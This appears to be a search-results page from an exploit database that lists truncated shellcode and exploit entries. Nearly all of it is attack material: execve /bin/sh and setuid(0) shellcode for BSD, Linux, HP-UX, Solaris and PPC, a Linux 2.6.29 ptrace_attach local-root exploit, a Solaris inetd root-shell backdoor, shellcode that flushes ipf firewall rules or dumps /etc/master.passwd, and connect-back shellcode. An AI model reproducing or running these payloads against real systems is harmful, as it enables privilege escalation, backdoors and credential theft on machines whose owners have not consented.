1135 matches found
freebsd/x86-64 - execve /bin/sh shellcode 34 bytes
freebsd/x86-64 execve /bin/sh shellcode 34 bytes. Shellcode exploit for freebsdx86-64 platform / Anderson Eduardo Hack'n Roll http://anderson.hacknroll.com http://blog.hacknroll.com .section .text .globl start start: xor %rcx,%rcx jmp string main: popq %rsi movq %rsi,%rdi pushq %rsi pushq %rcx mo...
freebsd/x86-64 execve /bin/sh shellcode 34 bytes
Exploit for freebsd/x86-64 platform in category shellcode ================================================ freebsd/x86-64 execve /bin/sh shellcode 34 bytes ================================================ / Anderson Eduardo Hack'n Roll http://anderson.hacknroll.com http://blog.hacknroll.com...
linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes
Exploit for linux/x86 platform in category shellcode ================================================= linux/x86-64 setuid0 + execve/bin/sh 49 bytes ================================================= / setuid0 + execve/bin/sh - just 4 fun. main asm "xorq %rdi,%rdi\n\t" "mov $0x69,%al\n\t" "syscall...
linux/x86-64 - setuid0 + execve/bin/sh 49 bytes
linux/x86-64 setuid0 + execve/bin/sh 49 bytes. Shellcode exploit for linx86 platform / setuid0 + execve/bin/sh - just 4 fun. xi4oyu at 80sec.com main asm "xorq %rdi,%rdi\n\t" "mov $0x69,%al\n\t" "syscall \n\t" "xorq %rdx, %rdx \n\t" "movq $0x68732f6e69622fff,%rbx; \n\t" "shr $0x8, %rbx; \n\t" "pu...
Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation
/ GNU/Linux kernel 2.6.29 ptraceattach local root race condition exploit. ========================================================================== This is a local root exploit for the 2.6.29 ptraceattach race condition that allows a process to gain elevated privileges under certain conditions...
Linux Kernel 2.6.29 - ptrace_attach() Race Condition Privilege Escalation
Linux Kernel 2.6.29 - ptraceattach Race Condition Privilege Escalation / GNU/Linux kernel 2.6.29 ptraceattach local root race condition exploit. ========================================================================== This is a local root exploit for the 2.6.29 ptraceattach race condition that...
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging
No description provided by source. / ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 c0d3z3r0 [email protected] ; [email protected] http://anderson.hacknroll.com http://blog.hacknroll.com \x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00...
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging. Shellcode exploit for freebsdx86 platform / ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 c0d3z3r0 http://anderson.hacknroll.com http://blog.hacknroll.com \x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00...
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging
Exploit for freebsd/x86 platform in category shellcode ================================================== FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging ================================================== / ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 c0d3z3r0 andersonunderground...
CSO/x86 - execve("/bin/sh", ..., NULL) - 43 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 SCOSV scosysv 3.2 5.0.7 i386, execve"/bin/sh", ..., NULL; / include "sys/types.h" include "stdio.h" char scode = "\x31\xc9" // xor %ecx,%ecx "\x89\xe3" // mov %esp,%ebx "\x68\xd0\x8c\x97\xff" // push $0xff978cd0...
Hp-ux - execve(/bin/sh) - 58 bytes
No description provided by source. / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"...
NetBSD/x86 - execve(/bin/sh) - 68 bytes
No description provided by source. / NetBSD execve of /bin/sh by humble of Rhino9 / char shellcode = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"...
Solaris/x86 - add services and execve inetd - 201 bytes
No description provided by source. / Solaris/x86 Just execve's the following: "echo "ingreslock stream tcp nowait root /bin/sh sh -i"/tmp/x;" "/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x"; for a trivial remote bd. Used in a few old Solaris/x86 remote exploits. / char c0de =...
FreeBSD/x86 - setuid(0)&execve({"//sbin/ipf","-Faa",0},0); - 57 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xo...
BSD/ppc - execve(/bin/sh) - 128 bytes
No description provided by source. / Linux PPC shellcode execve of /bin/sh by Palante / long shellcode = / Palante's BSD PPC shellcode w/ NULL/ 0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6, 0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4, 0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14, 0x7CC419A...
FreeBSD/x86 - execve(/bin/cat & /etc/master.passwd) - 65 bytes
No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
NetBSD/x86 - setreuid(0, 0); execve("/bin//sh", ..., NULL); - 29 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve"/bin//sh", ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / include "sys/types.h" include "stdio.h" include "string.h" char scode = "\x9...
BSD/32bits - Passive Connection - 126 bytes
No description provided by source. ; Passive Connection Shellcode ; ; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades firewalls... ; ; YES, this is for NASM, I detest AT&T syntaxis - it's gross and unreadable ; ; This is the FreeBSD...
BSD/x86 - setuid/execve - 30 bytes
No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. Tested on OpenBSD and FreeBSD. / ...
BSD/x86 - execve(/bin/sh) - 27 bytes
No description provided by source. / execvesh.c by n0gada 27 bytes. / include "stdio.h" char shellcode= "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int mainvoid int ret; printf"%d\n",strlenshellcode; ret = int &ret+2; ret = intshellcode; return...